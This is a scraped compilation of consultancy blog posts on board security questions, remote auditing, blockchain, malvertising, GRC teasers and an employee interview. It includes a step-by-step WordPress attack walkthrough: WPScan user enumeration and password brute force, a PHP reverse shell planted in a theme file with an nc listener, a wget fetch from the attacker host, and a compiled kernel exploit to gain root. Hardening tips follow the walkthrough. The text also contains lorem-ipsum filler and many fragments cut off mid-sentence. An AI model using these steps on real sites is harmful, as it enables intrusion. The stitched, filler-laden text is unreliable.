Governance, Risk, and Compliance (GRC) plays a pivotal role in organizational success by providing a structured and integrated approach to managing an organization's overall performance, addressing risks, and adhering to
Executive leaders of organizations and board members are ultimately responsible for ensuring the long-term security of their organization, and it helps in mitigating cyber risks. As board members realize how critical risk and security management is, they ask leaders more nuanced and complex questions. Interest in security and risk management (SRM) is all-time high at the board level. In 2019, Gartner conducted the security and risk survey and realized that four out of five respondents noted that security risk influences decisions at the board level.
The Gartner research helps security and risk management leaders analyze five categories of questions that should be prepared to answer at any executive or board-level meetings. Here are those questions.
Let’s discuss each of these in detail.
The Trade-Off Question - Are we 100% Secure?
The trade-off question is that the security and management risk leaders struggle a lot. The question "Are we secure?" needs improvising and is generally asked by the board members who are uneducated and unaware of the impact of security risks on the business. In this scenario, it is impossible to prohibit 100% of the incidents. The CISO's responsibility is to help identify and evaluate the potential risks for an organization and allocate resources to manage them.
According to Gartner's report, a security and risk management leader in response to this question might say,
"It is impossible to remove all resources of the information risk considering the evolving nature of the cyber threat landscape. My responsibility is to work with other aspects of the business to execute controls for managing security risks that can prevent us from improving operational efficiency and brand image. There is no such thing as 'perfect protection' in security. We have to reassess continually how much risk is appropriate as the business grows. We aim to develop a sustainable program to balance the requirements to protect against the needs to run a business”.
The Landscape Question - How bad is it out there?
Most of the board members want to know their security compared to peer organizations. They read threat reports and blogs, listen to the broadcast, and even are forced by the regulation to understand such things. Gartner recognizes the need to discuss this landscape. Leaders need to avoid trying to quantify risks to possible extent and attaching certain budget figures to the mitigation cost depending on something external. Moreover, when benchmarks give some material for conversation, they must be a negligible factor in the decision-making process.
Here are some responses that security and risk management leaders can give while discussing the wider security landscape.
| External Events | Responses |
| Our primary competitor experienced a public, successful attack. | We have a similar vulnerability that can facilitate the attack, and we are addressing that weakness. Enhanced monitoring abilities have been implemented. |
| There is an increased number of attacks against the electricity grids in three of the national presence points. | We don't expect to become a direct target. Business continuity plans are being tested and updated to overcome the prolonged outage. |
| We fall under the scope of the new EU General Data Protection requirements. | We have conservative and cautious privacy practices in place. |
The Risk Question - Do we know what our risks are?
A risk outside the tolerance needs an antidote to bring it within tolerance. It does not require dramatic changes in a short time, so beware of overreacting. In the Gartner report, they present a way to defend the risk management decision, and you can change it according to your organization's risk tolerance.
One of the most common issues encountered in the report is that the evaluations are subjective and depend on flawed methodology. Security leaders must have evidence to support the evaluation, even when they are not called to present it. Another aspect that needs to be considered is whether to depict the typical outcome or the worst. For instance, most incidents in mild outcomes are within the ability of most companies to absorb. However, there is an infrequent incident that can result in a catastrophic outcome.
The Performance Question - Are we appropriately allocating resources?
Security is always a moving target. The security team needs to demonstrate their behavior to ensure the organization stays safe. It is particularly important to figure out if the resources are allocated appropriately and where the money is spent. The original strategy proposal should have margins for errors concerning the deadline and the budget. As far as there are overruns within these margins, they must be noncontroversial.
There may be valid reasons even if the overruns are outside the margins. The balanced scorecard approach is a way to understand how security contributes to business performance. In this approach, the top layer defines the business aspiration, and organization performance against those aspirations is expressed using a traffic light mechanism. However, it's not the only way. Some organizations have different types of dashboards to discuss business performance.
The Incident Question - How did this happen?
An incident is unavoidable, and treatment is a blessing in disguise. Security and risk management leaders should be aware that in some scenarios, incident details may have been tightly controlled (such as sensitivities associated with the incident). Using the fact-based approach and explaining your knowledge will eliminate the mystery and give confidence that you have control over the incident. Acknowledging the incident provides details on the business impact, outlines the flaws or gaps needed to work out, and offers a mitigation plan.
Decipher Complex Board Question
There are usually no deterministic answers to the board question, and responses are generally more about showing options for sponsorship instead of a definitive course of action. The options can vary based on the context of the discussion, the maturity of the board, the communication skills of the SRM leader, and the frequency of reporting. However, understanding and answering board questions require everyone to understand their roles. Therefore, the SRM leader should know that the board is interested in facilitating the business goal. Any query that may seem immature, ignorant, or complicated has a purpose behind it.
Wish you all a very happy 2021 and be a year filled with success, good health, and happiness to you and all your loved ones. With the year 2020 and the pandemic overwhelming us, we must be conscious of the increase in cyber security threats that are looming in front of us. Here are a few thoughts and considerations for the unenviable role of the CISO for a great start to 2021!
Make the management part of your problem
Senior management does not know the technicalities of how the breach occurs, nor they should need to know. However, they should be clearly aware of the risks thereof. Ensure that the senior management/ board is completely up-to-date of all risks. Increase your frequency of meetings and provide a crisp update of the open risks and how you are working to mitigate them with clear established timeline and dependencies. Costs and budget overruns should be highlighted ahead of time. Bring in business-friendly and business-relevant cyber security metrics and report them periodically. This way the management is more forthcoming in providing the necessary authority and help prioritize your initiatives.
Get the Appropriate Budget
Budget definition and allocation on a percentage of IT spend, a percentage of cost of breach, a percentage of business growth YOY – various models exists. While each has its benefits and pitfalls, the budget should be commensurate with your risk appetite. Continuing from the point above on having the management ‘onboard’ on cyber security initiatives will pave a long way in ensuring that an appropriate budget is allocated. Let us understand one thing clear. The world expects ‘more’ with ‘less’
Clearly Identify your Security Partners
One of the top fields where the skills available and the market-needs gap is widening. It is expected that with the CAGR of 17% in cyber security (products and services), this area can become the CISO’s nightmare quickly. Relying on experts to do the job is also essential. This can be problem-solved by engaging the right eco-system partners to do your job. Security technologies, security governance, security operations are niche areas and picking the right partner will ensure that they stay with you and provide you the much-needed assurance and help address your problem by bringing in the right skills. Remember, it is not required to boil the ocean.
Evolve Your Security to Protect Your Remote Infrastructure
Secure your remote workforce by proactively protecting against zero-day malware and phishing, consider human and technological factors to avoid falling victim to phishing attacks. In response to the coronavirus pandemic, Gartner analysts observed a more than 400% increase in client inquiries related to remote access technologies for the months of March, April, and May in 2020, compared to the previous three months. Furthermore, a recent Gartner survey reveals that 41% of employees are likely to work remotely post coronavirus pandemic.
Continuous Monitoring for all Critical Assets
90% of breaches in cloud-based infrastructure were due to configuration-related issues. Periodic assessment ( like once a year, once a quarter) may not be sufficient in today’s scenario. The new buzzword is continuous monitoring. Continuous monitoring of critical assets would be an aid to enable rapid detection of compliance issues and security risks within the IT infrastructure that could lead to compliance violations. This would help understand real-time changes to the infrastructure and with a good threat intelligence feed it is possible to address zero-day attacks with much robustness with effective continuous monitoring.
Please reach out to us to know more about this to [email protected] or personally to me at [email protected].
Global situations relating to the COVID-19 pandemic have impacted the business and has also impacted the work of auditors. The current situations challenge the conventional methods adopted for an audit. The current uncertainty and unpredictability may create risks of material misstatement in the audits.
There anyone who loves or pursues or desires to obtain pain of itself, because it is pain, but because
occasionally circumstances occur in which toil and pain can procure him some great pleasure. To take a
trivial example, which of us ever undertakes laborious physical exercise,
Predicting the unpredictable: Adapting to the changing needs” has always been a key mantra, and this holds true today with the emergence of COVID-19.
Considering the recent situation and the paradigm shift in business operations CyRAACS would advise the audit teams to adopt the below methods for a precise, fact-based audit.
1. Re-evaluate the audit scope
With the change in the mode of business operations and the technology implemented, auditors may have to relook at the scope of the audit. Include the technology and architecture deployed to support remote working. Auditors may have to re-evaluate the effort estimates and timelines based on the changes in the scope of the audit.
2. Utilize Collaboration tools and communicate
Conference or video call facilities or collaboration tools such as Skype, Teams, Slack, etc. allow for regular communication with clients and team members. Extensively use collaboration tools to communicate what you need and what you have been working on. An additional point to note while implementing these communication and collaboration technologies is to keep an eye on the advisories issued with the vulnerabilities identified in these technologies. Any open-source tools adopted may be evaluated for any security flaws before implementation.
3. Use cloud services for storing evidence
Utilize cloud storage services to collect audit evidence. The cloud services like OneDrive, SharePoint enable gathering adequate, appropriate audit evidence remotely. Ensure all security controls are implemented in the cloud service being used for restricting any data leakages. Additionally, ensure that the current cloud platform being used is accessible to all stakeholders required to provide data for the audit.
4. Technology controls to be stringently implemented by the IT Team
In the event of the recent crisis and the work from home model adopted globally, the IT team may be evaluating stricter and stringent controls on implementing digital certificates, Multi-Factor Authentication to the environment, etc. Auditors may integrate the additional security controls in their methodology to adapt to the changing environment.
5. Check for regulatory/contractual requirements for evidence sharing
All the regulatory requirements for data hosting, data sharing may be validated before sharing the data with the auditors. In the case of strict organizational policies on data sharing, organizations may create a segment or a white room for the auditors to securely review the evidence.
6. Centralize work performed by other auditors
Centralize the audit engagement and the documentation on the cloud platform. This would enable the audit team to coordinate and review the work of auditors to meet the requirements in auditing and reporting standards.
7. Flexibility in reporting audit findings
As audit teams respond to the crisis and changing business risks in differing ways there may arise a need for more adaptable and flexible auditing techniques During this period, auditors may not be restricted to the traditional reporting methods and may consider different reporting templates like unrated reporting, e-mail reporting, mid-review reporting.
8. Reassess key risks in a real-time environment
Risk changes rapidly with the slightest change in the environment. Re-Assess the current environment to identify the new threat landscape and associated risks. The exercise would give insights into the changing risk landscape and aid in developing a robust risk mitigation strategy.
Additional Articles for a good read and understanding of global security controls and audits:
1. NBS Special Publication 500-153: Guide to Auditing for Controls and Security: A System Development Life Cycle Approach
2. NIST Special Publication 800-53 A: Assessing Security and Privacy Controls in Federal Information Systems and Organizations.
In conclusion, conducting a cybersecurity audit in the midst of a crisis is essential to ensure that an organization’s data and systems are secure. It is important for organizations to be aware of best practices for such audits, in order to successfully mitigate risks and vulnerabilities during times of uncertainty. Preparing for potential cyber threats by strengthening security protocols should be considered as part of any crisis plan. Organizations must also remain vigilant and monitor their systems on an ongoing basis, so as to detect possible threats before they become a problem.
WordPress is a free and open-source PAAS structure that is being used by millions across the globe as a content management system. Its features include the integration of various plugins and themes.
Also, there are many vulnerabilities associated with the plugins and themes being used within WordPress to date. According to the statistics, 73.2% of the most popular WordPress installations are vulnerable to date. These can be identified using automated tools and can be exploited. One such example is explained in this blog on how an adversary can gain root access by exploiting a vulnerability present inside the WordPress theme engine.
There anyone who loves or pursues or desires to obtain pain of itself, because it is pain, but because
occasionally circumstances occur in which toil and pain can procure him some great pleasure. To take a
trivial example, which of us ever undertakes laborious physical exercise,
Below are the steps to perform Privilege escalation for a vulnerable WordPress theme engine:
Run Nmap enumeration scan to discover the open ports and services running on the target host.
Nmap reveals HTTP service running on port 80. Also, the directories discovered in the HTTP-enum scan points to the WordPress login page.
Browse to the login page of WordPress http://*target IP*/wp-login as shown in the screenshot below:
Now, to retrieve the username and password we need to run a brute-force scan using WPScan.
WPScan is a scanner built for enumerating and brute-forcing the usernames and passwords for WordPress.
Let us first enumerate a user enumeration scan to discover the user accounts linked with WordPress using the below command:
wpscan –url *target IP* –enumerate u
The user enumeration scan reveals the usernames of the users linked with WordPress account as shown in the screenshot below:
Now that we have the username, we shall run a brute-force scan to enumerate the password for the admin account. We will a run a brute-force scan to enumerate the password for the admin account for which we use the below command:
wpscan –url *target IP* –wordlist /root/rockyou.txt –username admin
As shown in the below screenshot, as part of the brute force scan we get the username and password for the admin account. The password for the admin account is princess.
Using the username and password obtained in the WPScan we try to login into the WordPress site and navigate to the themes section in the WordPress. WordPress plugins and themes are the vulnerable points for any WordPress website.
After login navigate to Appearance>Themes>Editor
Now, we observe that there are multiple .php files in the templates and archives section. We could use any of these to upload the PHP reverse shell. For example, we will try to use archive.php file to upload the PHP reverse shell.
Replace the contents of archive.php file and replace it with our PHP reverse shell.
In this case, let us use a PHP reverse shell that is downloaded from pentest monkey.
Run the below command and download the shell:
wget http://pentestmonkey.net/tools/web-shells/php-reverse-shell/ php-reverse-shell-1.0.tar.gz
Unzip the file using $tar -xzf php-reverse-shell-1.0.tar.gz command and copy the contents of the file in archive.php file in the browser.
The IP address and port should point to the attacking system’s IP and listener port as shown in the screenshot below:
Click on the update file at the bottom of the page and we observe that the files get updated successfully with the PHP reverse shellcode.
Now, open a new terminal and start a netcat listener on port 443 which is specified in the PHP reverse shell script using the below command:
· nc -nvlp 443
Now, navigate to the modified archive.page in the browser using the below link:
· http://*target IP*/wp-content/themes/twentytwelve/archive.php
As shown in the screenshot below, after traversing to the modified archive.php file in the web browser we get a low privilege reverse shell from the attacking systems IP to the victims IP.
We got a low privilege access for webserver user “www-data”.
The next step is to elevate the privilege and get root access.
Let us run a Linux privilege checker python script to enumerate the system info and check for the world-writable files.
For that run python server using the below command to transfer file from attacker’s system to target system
python -m SimpleHTTPServer 80
Download the linux.privchecker.py file on the tmp directory of the target system using the below command
wget http://*local IP*/linuxprivchecker.py
After enumerating we also know that the world-writable directory is the tmp directory for the user www-data.
We know that the Linux version in use is Linux 2.6.32. Let us download a python script from exploitdb named as Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) – ‘CAN BCM’ Local Privilege Escalation.
Download the script in the world-writable directory “tmp” which was discovered as part of the enumeration scan.
This script might be helpful in elevating from local privilege to root privilege.
Compile the script using the below command and save it in the output file named as rootpriv:
· gcc 14814.c -o rootpriv
Now, run the output file using ./rootpriv command.
Once the script is successfully executed using whoami check the current user.
We get access to the ROOT account as shown in the below screenshot:
Check for the files present in the root directory.
There is an interesting file wp.sql which has all the database tables and values in it which could be used to craft SQL injection attacks. Below are the contents of wp.sql file:
The blog summarizes how a user can gain root access using a vulnerable WordPress theme engine.
There are many other loopholes in WordPress that can be used to elevate privilege and retrieve sensitive information.
Below are the measures you can adopt to keep your WordPress site secure:
1. Sucuri Scanner
Install and use WordPress security plugin – Sucuri Scanner.
We need to set up an auditing and monitoring system that keeps track of everything that happens on the website. This includes file integrity monitoring, failed login attempts, malware scanning, etc.
The best part about Sucuri’s firewall is that it also comes with a malware cleanup and blacklist removal guarantee. Basically, if you were to be hacked under their watch, they guarantee that they will fix your website (no matter how many pages you have).
2. Change the Default “admin” username.
In the old days, the default WordPress admin username was “admin”. Since usernames make up half of the login credentials, this made it easier for hackers to do brute-force attacks.
Since WordPress doesn’t allow you to change usernames by default, there are three methods you can use to change the username.
3. Disable File Editing
WordPress comes with a built-in code editor which allows you to edit your theme and plugin files right from your WordPress admin area. In the wrong hands, this feature can be a security risk which is why we recommend turning it off.
4. Add Two Factor Authentication
The two-factor authentication technique requires users to log in by using a two-step authentication method. The first one is the username and password, and the second step requires you to authenticate using a separate device or app.
Most top online websites like Google, Facebook, Twitter, allow you to enable it for your accounts. You can also add the same functionality to your WordPress site.
5. Strong Passwords and User Permissions
Many systems and applications include functionality that prevents a user from setting a password that does not meet certain criteria. Functionality such as this should be leveraged to ensure only Strong passwords are being set.
6. Keep WordPress Updated
Since WordPress is open-source, anyone can study the source code to learn and improve it. You need to make sure that all your WordPress plugins, themes, and the core itself are always up to date.
7. Disable Directory Indexing and Browsing
Directory browsing can be used by hackers to find out if you have any files with known vulnerabilities, so they can take advantage of these files to gain access. Directory browsing can also be used by other people to investigate your files, copy images, find out your directory structure, and other information. Therefore, it is highly recommended that you turn off directory indexing and browsing.
Blockchain is an emerging technology that is quite popular nowadays due to the popularity of cryptocurrency. Apart from blockchain being used in cryptocurrency, it is also marketed as a cure for a lot of things including cybersecurity. Blockchain is considered to be a nearly impenetrable technology as by design, blockchain is resistant to modification of the data. The blockchain contains a list of records or blocks which are linked using cryptography. Each of those individual records/blocks contains information and data that are combined together and verified. Information such as a cryptographic hash function of the previous block, timestamp, and transaction details are permanently recorded in a distributed ledger. The ledger is decentralized in nature, all transactions are done across a peer-to-peer network. Blockchain technology is designed in such a way that there is no central authority or storage location. Every user on the network plays a part in storing some or all of the blockchain. Everyone is responsible for verifying the data that is stored and/or shared to make sure false data cannot be added and existing data cannot be removed.
Blockchain technology has been around for more than a decade. It was invented by a person using the name Satoshi Nakamoto in 2008 to serve as the public transaction ledger of the cryptocurrency bitcoin. However, as technology has gradually spread worldwide, people have begun using it in a variety of ways in numerous industries, including as a means to increase cybersecurity. Blockchain is a chain of records that leads to the formation of a distributed network that can have millions of users all over the world. Every user can add information to the blockchain and all data in the blockchain is secured through cryptography. Every other member of the network is responsible for verifying that the data being added to the blockchain is real. This is done using a system of three keys private, public, and the receiver’s key that allow members to check the veracity of the data while also confirming whom it comes from. The verified data then form a block and will be added to the chain of data. In order to make updates to a particular piece of data, the owner of that data must add a new block on top of the previous block, creating a very specific chain of code.
The network being accessed by an unauthorized person can lead to data being either stolen or damaged. Hence, it becomes essential for an individual or organization to determine the invasion. The mode of collecting and preserving evidence has a significant role to play in ensuring that the evidence is accountable in the courtroom during various situations such as lawsuits or criminal complaints.
Identifying the attack/breach and generating the required documents about the causes of cyber-attack or cyber fraud can be accountable through the use of blockchain technology. Truth-based evidence is always important in any cybercrime investigation. Digital evidence moves down the hierarchy through the chain of custody in the different levels of transactions in any investigation process. Blockchain technology can provide a clear and exhaustive view of the transactions that have taken place concerning the evidence, right from the time the evidence originated from the source [2].
There are many reported cases of missing police evidence and several of them go unaccounted for giving an easy way out for criminals, such types of things can also be prevented using blockchain technology. It can enable appropriate authorization to those who are permitted to enter the evidence room, whether electronic, magnetic, or by using private keys. The scientific approach in digital forensics flow through the search authorities, the chain of custody of evidence, imaging and hashing function, validation of data using appropriate tools, report-ability, and repetition of presentation. The entire process can be made data-centric using blockchain technology.
The hash validation with the blockchain and the timestamp will prevent repeatability and contamination of information. Keeping a clear and unique track of who accessed what and when will help to avoid the contamination of evidence and information. The blockchain technology-based application can be used to ensure proper operating practice when it comes to evidence management practices. Necessary questions like How the core data is stored, how it is communicated, who is the person responsible for handling the data, and the factors that contribute to the physical security of the data can all be streamlined efficiently. Ideas such as working with the duplicate copy and not with the original can be validated using the hash. The Hash function will take the data and will generate a fixed-sized bit sequence in the output. Thus, creating a digital fingerprint of the input data.
The number of people joining the world wide web and technology is continuously growing and developing at a very fast rate, more data gets produced and more hackers will attempt to steal or corrupt that data. The technology behind blockchain is flexible and unbelievably helpful for the future of the Internet, permitting users to better secure their data. Innovative uses for blockchain technology are already becoming a part of other fields beyond cryptocurrencies and can be especially useful to boost cybersecurity. Blockchain implementation will facilitate in forestall a lot of threats and attacks in a very system and might forestall the information from being taken or destroyed. A number of the items that blockchain will facilitate are: –
I. Preventing Fraud and Theft of data: – Blockchain technology provides one of the best securities to protect data from hackers by preventing potential fraud and decreasing the chance of data being stolen or compromised. In order to destroy or modify blockchain, a hacker would have to destroy the data stored on every user’s computer in the global network. This could be millions of computers, with each one storing a copy of some or all the data. Bigger blockchain networks with more users have an infinitely lower risk of getting attacked by hackers because of the complexity required to penetrate such a network.
II. Preventing Distributed Denial of Service (DDOS) Attacks: – Hackers can use several techniques to launch an attack, most common is sending a large number of requests/packets to the system until the system becomes unable to process these requests/packets and leading to the failure/crash of the system. DDoS attacks have been happening at an increased frequency recently, affecting bigger companies like Twitter, Spotify, SoundCloud, and more. The current difficulty in preventing DDoS attacks comes from the existing Domain Name System (DNS). The fact that it is only partially decentralized means that it is still vulnerable to hackers because they are able to target the centralized part of DNS and continue crashing one website after another. Implementing blockchain technology would fully decentralize DNS, distributing the contents to a large number of nodes and making it nearly impossible for hackers to attack. Domain editing rights would only be granted to those who need them (domain owners) and no other user could make changes, significantly reducing the risk of data being accessed or changed by unauthorized parties.
III. Decentralized Storage Solutions: –
Data is becoming more valuable than gold and oil. Every business and individuals accumulate tones of sensitive data about themselves or customers. Unfortunately, this data is also quite attractive to hackers. And one of the most convenient things you do for cybercriminals is to store all of it in one place. The business mainly is still using centralized storage when it comes to data. Blockchain-based storage solutions are slowly gaining popularity. An example of this can be Apollo data cloud which is developed by the Apollo Currency team allows users to archive data on the blockchain and grant permission for access to third parties. The cryptographic access key can be revoked at any time, further reducing the risk of a breach. Thanks to the decentralized nature of blockchain technology, hackers no longer have a single point of entry, nor can they access entire repositories of data in the event that they do get in.
Malvertisements are malicious advertisements distributed in the same way as legitimate online advertisements. It is one of the common practices to use spread malware. Cybercriminals use the advertising strategy by pretending as legitimate campaigns. Those malvertisements will either attempt to download malware directly onto visitor’s systems/devices or redirect visitors to websites meant to spread ransomware, viruses, or other malicious programs. The process of creating malvertisements and spreading malware is called malvertising. Malvertising is a favoured medium for criminal behaviour as it takes advantage of consumer trust in both companies running campaigns and advertising networks.
Ad networks are responsible for distributing real and fraudulent advertisements. The reliability of a website does not necessarily determine and has also been irrelevant to some extent to whether or not it will contain malvertisements. But saying that at the same time is the best place to be not infected with malvertisements. Recent examples have proven that even the most well-known, legitimate sites can distribute malvertisements unknowingly. In recent years, reputed sites such as Forbes, The New York Times Online, London Stock Exchange, Spotify, etc have all been negatively impacted by malvertising campaigns that infected visitors with malware.
People, in general, are confused between malvertisements and Adwares as they both deal with affecting online advertisements. Adwares are a program running on a victim or user’s system which is packaged with other legitimate softwares. Adware displays unwanted advertising, redirects search requests to advertising websites, and mines data about the user to help target or serve advertisements.
Key differences between malvertisements and adwares are:
1. Malvertisements involve deploying or injecting malicious code on a publisher’s web page. The targeted audience of malvertisements are not individual or selected users whereas Adware, however, is only used to target individual users.
2. Malvertisements are only dangerous and affect users that view the infected webpage or website whereas adwares once gets installed keeps on operating on the user’s computer.
Malvertisements are distributed via the same methods as normal online advertisements. Infected graphic files are submitted to a legitimate advertisement network with hopes that the advertiser won’t be able to differentiate between trustworthy ads and harmful ones. Advertisements generally attract and encourage viewers to click. When approved by the advertisers these malicious advertisements are added or distributed on legitimate sites. In some cases, cybercriminals will even re-register expired, but previously legitimate, domains to disguise themselves as trustworthy domains. Criminals can use redirects to send clickers to a malicious site, and users remain ignorant because they expect redirects when clicking on an ad. While on the malicious website, code will run in the background which will attempt to download malware onto the device. This unintentional download of a virus or malicious code is known as a drive-by download. Malvertisements often use drive-by attacks to download ransomware onto targeted computers. Advanced forms of malvertisements can even install malware on visitor’s devices directly from the legitimate website that is displaying the ad and without any interaction from visitors.
Attackers or people with malicious intent use several delivery mechanisms to insert their malicious codes into advertisements.
1. Malwares in Advertisements calls: When a website shows a page featuring an ad, the ad exchange delivers advertisements to the user through a variety of third parties. An attacker can compromise one of these third-party servers, who can attach malicious code to the ad payload.
2. Post-click malware injection: Users who click on an ad are typically redirected between multiple URLs, ending with the ad landing page. If any of the URLs along this delivery path are compromised by an attacker, they may execute malicious code.
3. Malware in Text or Banner Advertisements: Malware may be found in a banner ad or text message. For instance, an ad can be delivered in HTML5 as a combination of images and JavaScript which may contain malicious code.
4. Malware within a pixel of an image: The pixels are embedded with codes in an advertisement call. A legitimate pixel sends data to the server for tracking purposes. If an attacker intercepts a pixel’s delivery path, it can send a response, containing malicious code, to the user’s browser.
5. Malware within the video: Video players don’t protect against malware. Examples can be videos based on flash or specific video formats such as VAST. Video format VAST contains pixels from third parties, which could contain malicious code. Videos based on flash can inject an Iframe into the page, which downloads malware, even without having the user click on the video. Flash files might also load a pre-roll banner and attackers can inject malicious code into the pre-roll banner, and it can run even without the user clicking on the video.
Common malvertisements generally need user interaction in order for the malwares to be downloaded in a victim’s system or infect the victim/user’s system. User interaction can be victims clicking on an unsafe malicious advertisement. Following attacks or things that might happen on users viewing or interacting with malvertisements:
1. Download or installation of malwares on the computer or systems viewing those malicious advertisements.
2. Redirect the user or victim to a malicious site.
Some advanced malvertisements can affect or cause harm to a user without user interaction. Malvertising might perform the following attacks on users viewing the malvertisements without clicking it:
1. A “drive-by download” — installation of malware or adware on the computer of a user viewing the ad. This type of attack is usually made possible due to browser vulnerabilities.
2. Forced redirect of the browser to a malicious site.
3. Displaying unwanted advertising, malicious content, or pop-ups, beyond the ads legitimately displayed by the ad network. This is done by executing Javascript.
What is your name and job title in CyRAACS?
My name is Anamika, I lead the Application security VAPT projects in CyRAACS.
How would you summarize what you do? Why CyRAACS is a great place to work
At CyRAACS I am responsible for managing and leading VAPT projects wherein we must conduct VAPT assessments for IT Systems, Web applications, Mobile applications, and critical network infrastructure. We as a team conduct manual application penetration testing of thick client applications, mobile applications, web applications and web services, API’s to minimize exposure to attacks.
I am responsible to communicate with client teams often to explain and demonstrate vulnerabilities to application/system owners and assist with the mitigation of the identified vulnerabilities. I support fast-paced delivery in challenging projects. My job requires me to be highly motivated, detail-oriented, and client-focused.
CyRAACS is a great place to work because every day provides an opportunity to learn something new, to mentor, and to be mentored to achieve our client’s goals. Being part of a team that is focused and dedicated to stand up to client expectations and help employees succeed, is the best thing anyone can ask for in their career.
How long have you worked with CyRAACS?
I had the pleasure of working in CyRAACS for near to 3 years now.
What is the most interesting thing about working in CyRAACS, and about the work you do?
CyRAACS follow a no hierarchy model wherein the management keeps their doors open to promote new ideas and transparency of information within the organization.
My job demands me to be constantly updated with the latest technologies to challenge myself to know more about the trend revolving around cyber security. I like the fact that I can interact with the key stakeholders and technical team to suggest security remediations in line with their business scenario.
My journey through these years has seen many changes come through in the organization, and each time, these have been for the better, for the leadership in CyRAACS is committed to make CyRAACS a big success story in the coming years.
What are three benefits you have discovered about working in CyRAACS that you weren’t aware of when you started?
My journey at CyRAACS has been very gratifying and rewarding. I always had opportunities and challenges beyond my current role which helped me prove myself and achieve greater heights.
CyRAACS has helped me achieve my professional goal by sponsoring my certification.
I have learned over these years about my own domain, but there has also been a lot of cross-functional learning which has helped in overall growth in my career.
At CyRAACS, Individuals come in at different levels with different skill sets, expertise, aspirations, and attitudes. Here, at CyRAACS we learn to think independently, be focused, and push ourselves out of our comfort zone. This is a company that adds significant value to each employee, and it helps each individual reach her or his highest potential
I am proud and humbled to be amongst such incredibly talented people and I am thankful for the opportunity to contribute to our continued success.
What are your thoughts about the company’s vision and direction, and your role in helping CyRAACS achieve them?
Management at CyRAACS has always been transparent about what they are doing to achieve the company’s vision and has ensured that we are kept aware of the progress the company is making.
When I see my leaders working hard to live the standards of the vision, I feel equally motivated to do the same. I believe that we should be accountable for meeting our own goals and doing our part to achieve the company’s vision and direction.
I agree with the fact that transparency is great for the company's vision, but it is also a good way to build trust with employees and customers. Staying transparent about the failures and successes of the company will help your employees be more engaged and productive.
What advice would you give a job seeker who’s thinking about applying for a job with CyRAACS?
My advice to job seekers would be if you are looking for a challenging, fast-growing environment with opportunities to learn cross-functional skills, CyRAACS is a one-stop for you.
Specifically, for freshers, this is a great place to start their career because here you are mentored at every step to push yourself ad uncover your true professional.
The culture is transparent, every employee, irrespective of their position is given a chance to be heard, and there are ample opportunities available to those who want to build a career here
When you tell people about your job, what’s one thing that surprises them, or gets them excited about the work you do?
As the first job is considered as a most important point in anyone’s career path, CyRAACS proved to be the right tipping point for me. I joined as a fresh MBA graduate.
Early in my career, I was given a chance to handle a separate developing service line – Application security and I was trusted with the responsibility of handling stakeholders on my own. The whole experience has been a great learning opportunity for me.
My growth graph has been exponential as the management here has been very supportive and has given me ample learning opportunities with meaningful rewards and recognition.
Your achievements, Value provided to clients and Clients empathy etc
I have successfully completed 150+ projects with more than 50% repeat engagements.
Client achievement and empathy: I have received excellent recommendations from the majority of my clients highlighting the quality of deliverables, meeting up to the deadlines, and going beyond the set expectations from industry sector clients such as Banking industries, IT services, Healthcare, and Telecommunications.
On request from one of our clients, a tax consulting multinational company wherein the client had to make their application go live, we were given a strict deadline to complete the said task. Conducting VAPT and helping a client secure their application was one of the major responsibilities which I abided to. The client was very happy with the engagement and in turn, suggested their internal departments conduct VAPT for their other applications.
Overnight audit requirement for one of our clients operating in small finance bank sectors was a crucial task to be completed. A time constraint of 1 day was given to retest 10 applications. I took it as a challenge and had push myself to meet the said timelines and completed the task by leading my team. The client in return has extended their empanelment contract with us as their security partner.
Client-specific challenges wherein their application is inaccessible, or new functionality is introduced within the application, we have ensured that we accommodate such requests and perform multiple rounds of testing to make certain that all the functionalities of the application are tested, and the application is secure to go live on production. Clients have considered this as a key-value provided to them appreciating our extra efforts.
On request from one of our clients, an IT services company, we had to conduct VAPT for their application and Infrastructure components wherein they were given a strict government deadline to abide by. This request was taken into priority and I had to drive it to completion within the said timelines. A client gave positive feedback on the engagement and gave our referrals to other partner companies as a result.
Achievements and Certifications
Client Success Stories
Repeat clients – Our quality output and focussed approach has made CyRAACS an empanelled security partner for many of the client projects led by me across various industry sectors such as Finance, Banking, IT services, Healthcare, Telecommunications.
Referrals – Many of our clients have given referrals to their other partner companies for CyRAACS as a security vendor.
Governance, Risk, and Compliance (GRC) plays a pivotal role in organizational success by providing a structured and integrated approach to managing an organization's overall performance, addressing risks, and adhering to
Compliance with government laws, regulations, and rules is essential for all organizations. A regulatory requirement is a directive imposed by a government entity on an organization.
In today's dynamic business landscape, organizations face an ever-increasing array of challenges, from regulatory compliance and cybersecurity threats to operational risks and data privacy concerns. To navigate
Information security is a critical concern for organizations in the digital age, as the proliferation of data and technology brings new vulnerabilities and threats. To safeguard sensitive information, organizations must conduct information security risk assessments. This comprehensive guide will walk you through the key steps and best practices involved in
Purchasing ISO 27001 document – Your organization must purchase the ISO 27001 document and understand how to implement a structed ISMS for your organization. This will help your organization to understand why the controls are necessary and how they can be implemented to mitigate risks.
In the age of digitalization, where personal data has become a valuable commodity, the need for robust data protection laws has become increasingly crucial. Recognizing this need, India has enacted the Digital Personal Data Protection Act, 2023 (DPDPA), marking a significant milestone in the country's data
The General Data Protection Regulation is a law that was enacted in 2018, it has transformed the way businesses worldwide handle and protect personal data. With stringent requirements for data privacy and security, GDPR compliance is essential for organizations that collect, process, or store
In today’s ever-evolving cyber and risk landscape, information security has come to the forefront to combat the sophistication of cyberattacks and the constantly changing technology framework. Two widely recognized information security standards stand out in this arena: ISO 27001
Embarking on the journey of Governance, Risk Management, and Compliance (GRC) is a significant step for any organization in today's complex and highly regulated business environment. To thrive and ensure sustainable growth, businesses must proactively address governance issues, manage risks, and meet compliance requirements. In this article, we will guide you through the crucial steps […]
In the ever-evolving realm of cybersecurity, organizations face an unceasing challenge to secure their digital fortresses. A mid-sized financial services firm prides itself on its commitment to safeguarding customer data and financial assets. However, recent cyber threats have escalated, and the firm is keen to ensure that its cybersecurity defences remain
In today's digital age, where data is the lifeblood of business operations, protecting sensitive financial information has never been more critical. The Payment Card Industry Data Security Standard (PCI DSS) was established to ensure the secure handling of card data, and compliance with this standard is mandatory for any organization that processes cardholder information. Achieving […]
In the ever-evolving world of IT, security has become a necessity more than a precautionary decision or a luxury that most organizations overlook. With the ever-increasing sophistication of cyberattacks, businesses are constantly seeking ways to safeguard their sensitive information and protect their customers' trust. Two widely recognized information security standards stand out in this
In today's dynamic business landscape, internal audit plays an even more critical role due to the complexities and the increased emphasis on
One of the key reasons for vulnerabilities in the applications are lack of secure design,
development, implementation, and operations.
